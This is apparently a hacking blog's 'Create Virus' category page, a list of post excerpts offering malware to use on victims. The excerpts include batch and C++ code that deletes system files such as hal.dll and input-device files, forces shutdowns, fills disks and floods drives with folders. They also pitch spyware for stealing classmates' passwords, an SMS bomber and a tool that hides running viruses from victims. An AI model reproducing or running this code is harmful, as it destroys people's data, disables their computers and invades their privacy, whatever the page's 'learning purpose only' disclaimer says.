Hi friends, the most interesting part of the hacking is spying. Today i am going to introduce to the C++ Spyware code. It is going to be very fun. You can install this spyware in your college/school or in your friend system, and get their username and passwords. This is very simple hacking trick […]
Category: Create Virus
Hacking Autorun.inf virus attack|Is autorun.inf virus?
When i studied second year(cse), my friends told that autorun.inf is virus. I thought so. Because my antivirus blocks autorun.inf files. In third year when i search about autorun.inf file in net, i realize about the auto run file. Today i bring some files from my college system. When i insert the pen drive […]
How to hide the windows while running the virus code?
Good Morning Friends…!! This day will be great day! Because Break The Security get top rank in blogger directories. Now i am going to introduce a new tool called as “CMDOW” . When you create and send virus to victim, the virus running process may be shown to victims. This tool will hide that also. […]
C++ ,Batch Virus code to disable All Hard disk
Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also. C++ Virus Code : #include < windows.h >#include < fstream.h >#include < iostream.h >#include < string.h >#include < conio.h >int main(){ofstream write ( “C:\WINDOWS\system32\HackingStar.bat” ); […]
Command Line SMS Bomber for linux users
This Post is writtern By disk0A friend and I wrote this command line SMS bomber in Bash. It allows you to set the message you want to send, the phone number to send it to, the carrier of the phone (which can be found at http://www.fonefinder.net), and the delay between messages. You’ll need to install […]
Virus to Delete mouse,explore,logoff using Batch Programming
Usually we write simple viruses in batch programming. This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer. @echo off @if exist c:windowssystem32mouse del c:windowssystem32mouse@if exist c:windowssystem32keyboard del c:windowssystem32keyboardcopy C:windows@if exist c:windowssystem32logoff.exe del c:windowssystem32logoff.exe@if exist C:program filesinternet exploreriexplore.exe del C:program filesinternet exploreriexplore.exe […]
C++ virus that deletes the hal.dll file in system32
Hi in this article i will give you the c++ virus code. Don’t use for any illegal purpose. This is just for learning purpose only. #include<stdio.h>#include<stdlib.h> using namespace std; int main(int argc, char *argv[]){std::remove(“%systemroot%\system32\hal.dll”); //PWNAGE TIMEsystem(“shutdown -s -r”);system(“PAUSE”);return EXIT_SUCCESS;} Above code will find the system32 folder and deletes the “hal.dll” file Hal.dll Hal.dll is Windows’ […]
How to create a Big size file ?
You can create a big size file using windows default command prompt itself. Why we need huge size file? When you create virus or you can use in your college for occupying the memory. First of all Decide the Size of huge file. For eg, if you decide 1 milliion byte,then we should convert it […]
C program Memory Space Eater virus
Hi friends this is BreakTheSec. I am going to give you C program to eat the memory in Hard drive. This virus is able to eat the memory space 1 GB per minute. So Becareful with this virus. #include<stdio.h>#include<conio.h>#include<dos.h>#include<stdlib.h>FILE *a,*t,*b;int r,status,vir_count;double i;char ch[]=”CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE”,choice; void eatspace(void);void findroot(void);void showstatus(void);void draw(void);void […]
Create a virus to create a infinite folder in a drive
Hi Hackers, this batch code will very helpful for you. This is simple and effective virus code. As usual open notepad.Copy this code to Notepad. @echo off:topmd %random%goto top @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.md %random% is command that creating folders […]